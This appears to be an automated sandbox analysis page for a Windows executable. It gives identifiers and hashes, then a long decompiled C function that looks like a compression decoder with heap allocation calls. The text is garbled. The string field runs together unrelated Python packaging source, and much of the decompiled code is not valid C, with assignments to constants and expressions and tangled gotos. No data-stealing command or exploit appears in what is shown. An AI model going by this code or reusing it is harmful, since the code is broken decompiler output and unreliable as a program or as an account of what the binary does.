String ID: use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi$# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508."""
API String ID: 2738559852-717215376
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4

Uniqueness

Uniqueness Score: -1.00%

Function 00407090, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00407090() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074FE))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
